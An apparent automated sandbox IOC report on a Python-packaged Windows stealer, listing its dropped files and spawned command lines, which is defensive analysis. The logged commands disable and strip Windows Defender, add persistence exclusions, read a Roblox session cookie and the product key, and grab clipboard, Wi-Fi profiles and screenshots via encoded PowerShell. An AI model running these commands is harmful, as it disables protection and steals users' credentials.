IOC Report
SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\R9FJX.zip
RAR archive data, v5
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe
PE32+ executable (console) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI76002\rarreg.key
ASCII text
dropped
malicious
C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (602), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\? ? \Display (1).png
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\MpCmdRun.log
Unicode text, UTF-16, little-endian text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\RES3733.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Thu May 23 01:16:49 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\VCRUNTIME140.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\_bz2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\_ctypes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\_decimal.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\_hashlib.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\_lzma.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\_queue.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\_socket.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\_sqlite3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\_ssl.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\blank.aes
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\libcrypto-1_1.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\libffi-8.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\libssl-1_1.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\python311.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\select.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\sqlite3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI76002\unicodedata.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0c1jk2uv.15r.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3irfobuz.2z0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kclmv5r.1by.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afeqbbkm.cmn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ai0r4lsm.erx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aohakydu.c0t.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_br0j3qie.bnt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccwtjpkd.n2j.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddz0ocwq.hav.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1syxpme.uzd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fgrmdg4r.nyz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_glevqxfx.xct.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kwvi5lhg.z4o.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1efh13z.cjv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lcdjrlk2.451.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1qj5kqe.1zn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrornz3p.rcc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qtzrjp1b.50z.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rf04ztue.v4f.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sm2g44o5.tm3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uswaxbu5.g2u.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vqgwfbgp.bar.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xm5ml0fq.wp2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zazph0yb.xza.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.0.cs
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.out
Unicode text, UTF-8 (with BOM) text, with very long lines (705), with CRLF, CR line terminators
modified
\Device\ConDrv
ASCII text, with CRLF line terminators
dropped
There are 47 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
"C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"
malicious
C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
"C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
malicious
C:\Windows\System32\systeminfo.exe
systeminfo
malicious
C:\Windows\System32\netsh.exe
netsh wlan show profile
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\getmac.exe
getmac
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
malicious
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *"
malicious
C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe
C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic os get Caption
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic csproduct get uuid
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic path win32_VideoController get name
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
